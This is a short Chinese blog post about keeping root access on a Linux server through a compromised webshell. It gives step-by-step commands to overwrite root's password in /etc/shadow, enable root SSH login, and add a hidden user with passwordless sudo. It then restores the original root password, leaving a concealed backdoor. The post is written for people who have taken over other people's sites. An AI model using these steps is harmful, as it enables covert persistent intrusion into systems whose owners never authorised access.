Linux提权笔记

没啥技术含量,一种思路，让某些得到root权限webshell的童鞋可以快点拿到权限。某日拿到某站webshell，RedHat 系统，Tomcat程序是root身份启动的，webshell当然也拥有root权限。1.webshell直接替换root密码: /etc/shadow // 记得备份2.允许root通过ssh登陆: /etc/ssh/sshd_configPermitRootLogin yes #允许root登陆3.重启ssh服务 service ssh restart4.以root身份登陆ssh，增加一个用户useradd applicationpasswd // 根据提示设置密码5.更改application用户运行su不需密码chmod +w /etc/sudoers // 增加写入权限，默认只读修改/etc/sudoersvi /etc/sudoers加入application ALL=（ALL） NOPASSWD: ALL6.把root密码修改回原样，禁止root登陆。并去除sudoers的写属性（chmod -w /etc/sudoers）。完工最后，上图root用户登陆:普通用户登陆，su免密码进入root权限Linux内核中的漏洞提供了非法根权限Linux Kernel DE4X5_GET_REG请求内核信息泄露漏洞相关资讯 Linux安全

发现针对 Linux 服务器和代码库的（11/08/2015 09:11:50）
Linux安全与优化（12/05/2014 17:04:31）
加强 Linux 桌面安全（08/15/2014 11:36:10）

牢记这七点让你的Linux服务器变得（08/12/2015 15:39:07）
树大招风，Linux的安全威胁正在不（08/24/2014 21:44:47）
GNU/Linux安全基线与加固（07/22/2014 13:51:21）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款